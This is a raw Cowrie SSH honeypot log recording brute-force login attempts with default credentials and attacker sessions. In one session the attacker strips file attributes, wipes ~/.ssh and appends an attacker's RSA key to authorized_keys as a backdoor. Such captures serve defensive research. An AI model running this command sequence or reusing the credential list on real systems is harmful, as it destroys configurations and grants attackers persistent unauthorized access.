{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:14:53.250152Z","src_ip":"194.233.79.134","session":"8bba462b02fb"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-28T03:14:54.416987Z","src_ip":"194.233.79.134","session":"8bba462b02fb"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:55.729120Z","src_ip":"194.233.79.134","session":"8bba462b02fb"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":20582,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f7ee2f69823","protocol":"ssh","message":"New connection: 45.125.211.194:20582 (1.2.3.4:22) [session: 2f7ee2f69823]","sensor":"my-vps","timestamp":"2025-08-28T03:15:03.591602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:15:03.606432Z","src_ip":"45.125.211.194","session":"2f7ee2f69823"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:15:03.806614Z","src_ip":"45.125.211.194","session":"2f7ee2f69823"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:15:04.645392Z","src_ip":"45.125.211.194","session":"2f7ee2f69823"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:05.857922Z","src_ip":"45.125.211.194","session":"2f7ee2f69823"}
{"eventid":"cowrie.session.closed","duration":20.294763565063477,"message":"Connection lost after 20 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:08.079637Z","src_ip":"212.227.235.229","session":"e34d874840ec"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":9215,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4f454658ebb","protocol":"ssh","message":"New connection: 45.125.211.194:9215 (1.2.3.4:22) [session: a4f454658ebb]","sensor":"my-vps","timestamp":"2025-08-28T03:15:18.502607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:15:18.531722Z","src_ip":"45.125.211.194","session":"a4f454658ebb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:15:18.717676Z","src_ip":"45.125.211.194","session":"a4f454658ebb"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:15:19.545701Z","src_ip":"45.125.211.194","session":"a4f454658ebb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:20.756335Z","src_ip":"45.125.211.194","session":"a4f454658ebb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1427,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6af1d2da99a","protocol":"ssh","message":"New connection: 212.227.235.229:1427 (1.2.3.4:22) [session: f6af1d2da99a]","sensor":"my-vps","timestamp":"2025-08-28T03:15:25.069376Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:25.173676Z","src_ip":"212.227.235.229","session":"f6af1d2da99a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16188,"dst_ip":"1.2.3.4","dst_port":22,"session":"7159b7a6f81b","protocol":"ssh","message":"New connection: 212.227.235.229:16188 (1.2.3.4:22) [session: 7159b7a6f81b]","sensor":"my-vps","timestamp":"2025-08-28T03:15:25.278502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:15:25.282588Z","src_ip":"212.227.235.229","session":"7159b7a6f81b"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa","ssh-dss","rsa-sha2-512","rsa-sha2-256","ecdsa-sha2-nistp256","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-28T03:15:25.384888Z","src_ip":"212.227.235.229","session":"7159b7a6f81b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:25.596956Z","src_ip":"212.227.235.229","session":"7159b7a6f81b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":59507,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b2c171ff91c","protocol":"ssh","message":"New connection: 45.125.211.194:59507 (1.2.3.4:22) [session: 8b2c171ff91c]","sensor":"my-vps","timestamp":"2025-08-28T03:15:33.298014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:15:33.327575Z","src_ip":"45.125.211.194","session":"8b2c171ff91c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:15:33.511868Z","src_ip":"45.125.211.194","session":"8b2c171ff91c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46098,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4ca5b05177","protocol":"ssh","message":"New connection: 212.227.235.229:46098 (1.2.3.4:22) [session: ef4ca5b05177]","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.334836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.335507Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.337891Z","src_ip":"45.125.211.194","session":"8b2c171ff91c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.450761Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:15:34.778608Z","src_ip":"45.125.211.194","session":"8b2c171ff91c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.779491Z","src_ip":"45.125.211.194","session":"8b2c171ff91c"}
{"eventid":"cowrie.login.success","username":"root","password":"ly123456!","message":"login attempt [root/ly123456!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.886340Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.989152Z","src_ip":"45.125.211.194","session":"8b2c171ff91c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:34.990307Z","src_ip":"45.125.211.194","session":"8b2c171ff91c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:15:35.162226Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.163208Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.163952Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.355740Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:15:35.529064Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.529739Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.624186Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.625115Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46099,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c989cf44e2d","protocol":"ssh","message":"New connection: 212.227.235.229:46099 (1.2.3.4:22) [session: 1c989cf44e2d]","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.725678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.734188Z","src_ip":"212.227.235.229","session":"1c989cf44e2d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:15:35.829254Z","src_ip":"212.227.235.229","session":"1c989cf44e2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:15:36.224867Z","src_ip":"212.227.235.229","session":"1c989cf44e2d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:37.317806Z","src_ip":"212.227.235.229","session":"1c989cf44e2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46100,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6acf5bcc6a9","protocol":"ssh","message":"New connection: 212.227.235.229:46100 (1.2.3.4:22) [session: e6acf5bcc6a9]","sensor":"my-vps","timestamp":"2025-08-28T03:15:37.408781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:15:37.409439Z","src_ip":"212.227.235.229","session":"e6acf5bcc6a9"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:15:37.507828Z","src_ip":"212.227.235.229","session":"e6acf5bcc6a9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:15:37.939151Z","src_ip":"212.227.235.229","session":"e6acf5bcc6a9"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:38.034211Z","src_ip":"212.227.235.229","session":"ef4ca5b05177"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:38.035041Z","src_ip":"212.227.235.229","session":"e6acf5bcc6a9"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":49998,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0e764dc3073","protocol":"ssh","message":"New connection: 45.125.211.194:49998 (1.2.3.4:22) [session: c0e764dc3073]","sensor":"my-vps","timestamp":"2025-08-28T03:15:48.133976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:15:48.150957Z","src_ip":"45.125.211.194","session":"c0e764dc3073"}
